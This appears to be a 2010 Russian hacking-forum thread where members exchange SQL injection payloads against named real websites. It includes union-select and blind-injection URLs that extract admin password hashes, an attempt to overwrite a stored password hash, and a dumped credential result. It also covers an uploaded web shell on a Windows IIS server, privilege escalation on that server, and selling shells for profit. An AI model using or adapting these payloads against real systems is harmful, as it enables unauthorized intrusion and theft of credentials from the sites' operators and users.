Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    //Решено
     
    #13541 DeluxeS, 13 Jun 2010
    Last edited: 13 Jun 2010
  2. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное...

    ищи и качай Adminer - Compact MySQL management
    хорошая штука!
     
  3. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    Большое спасибо, отличная вещь, ещё раз спасибо :)
     
    #13543 DeluxeS, 13 Jun 2010
    Last edited: 13 Jun 2010
  4. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    Я сейчас задам тупой вопрос. Залил шелл на Windows NT 5.2. Но процесс повышения прав в Windows - тёмный лес для меня.

    Кто может помочь - стукните в аську 3765431-четые-9
     
  5. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Браузер вывел следующие таблицы:

    www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+--+

    ADMIN,
    ALERT,
    AUTHORS,
    EDITORS,
    IPS,
    MYPICS,
    ONLINE,
    ORDERS,
    PAGES,

    Все таблицы в верхнем регистре.


    При таком запросе ничего не выводится.

    www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11,12+from+ADMIN+--+

    Вводим имя таблицы в нижний регистре, все выводится.

    www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11,12+from+admin+--+
     
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    А ты недумал что например, в css стоит что все слова под определённым дивом определённого размера? (Т.е. в верхнем, что в нижнем текст одинаковый).
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Важен, зайди в phpmyadmin и набери:

    select user from mysql.USER

    и сразу станет понятно
     
  8. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    зашел и все норм вывело ;)

    Вообще, чувствительность к регистру(при указании имени базы или таблицы) у мускула зависит от платформы. В большинстве случаев, в Linux регистр играет роль, в Windows и Mac OS напротив.
     
    #13548 Iceangel_, 13 Jun 2010
    Last edited: 13 Jun 2010
    4 people like this.
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Iceangel_:

    Согласен
     
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Вот инфа этого сайта. Линк дать немогу, так как сайт очень интересный.

    5.0.51A:REWER:REWER@LOCALHOST:SUSE-LINUX-GNU
     
  11. POloid

    POloid Banned

    Joined:
    7 Jun 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    кто подскажет как в это
    http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

    воткнут такой запрос
    UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

    и вообще это реально?
     
  12. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2POloid
    http://www.rsgt.com/press_releases1_more.php?id=19+and+substring(@@version,1,1)=5+--
    крути как blind

    Code:
    http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),1,1)))%3E52+--
    => первый символ хэша = "5"
    Code:
    http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),2,1)))%3E101+--
    => второй символ хэша = "f"
    и т.д.
     
    #13552 Bb0y, 13 Jun 2010
    Last edited: 13 Jun 2010
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Не, ну это не по пацански.
    Стоп, я тоже мудак дезинформатор.
    http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,unhex(hex(concat_ws(0x3a,user_pwd))),4,5,6,7,8+from+users

    2 Ruller, я заметил что там блайнд, вот и начал выпендриваться. А токо ща заметил что там обыкновенная скуля. (Без твоего поста (!) )
     
    #13553 Ctacok, 13 Jun 2010
    Last edited: 13 Jun 2010
    1 person likes this.
  14. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Bb0y, Ctacok WTF?!
    Code:
    http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,aes_decrypt(aes_encrypt(user_pwd,1),1),6,7,8+from+users
    нет
     
    2 people like this.
  15. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Bb0y ты видишь функцию UPDATE, речь идет не о извлечении хеша из БД, а изменении его с помощью запроса!!
     
  16. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    даа видно все сходят с ума
     
  17. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Эммм....Вывели 3-ма разными способами 1 скулю... Очень оригинально.. Завтра он задаст такой же вопрос, только уже в другом месте. Одни понты :(

    Нy просто о_Oчень интересный сайт... Продавай шелл > покупай квартиру.
    http://www.eje.cz/scripts/viewabstract.php?abstract=-1531'+union+select+group_concat(jmeno,0x3a,password),2,3,4,5,6,7,8,9,10,11,12+from+admin--+
    => 101111 1100001 1100100 1101101 1101001 1101110 1110011 101111
     
    #13557 v1d0qz, 13 Jun 2010
    Last edited: 13 Jun 2010
    2 people like this.
  18. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    актуально.
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196

    Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.
     
    1 person likes this.
  20. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21

    Microsoft-IIS/6.0

    Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.
     
Thread Status:
Not open for further replies.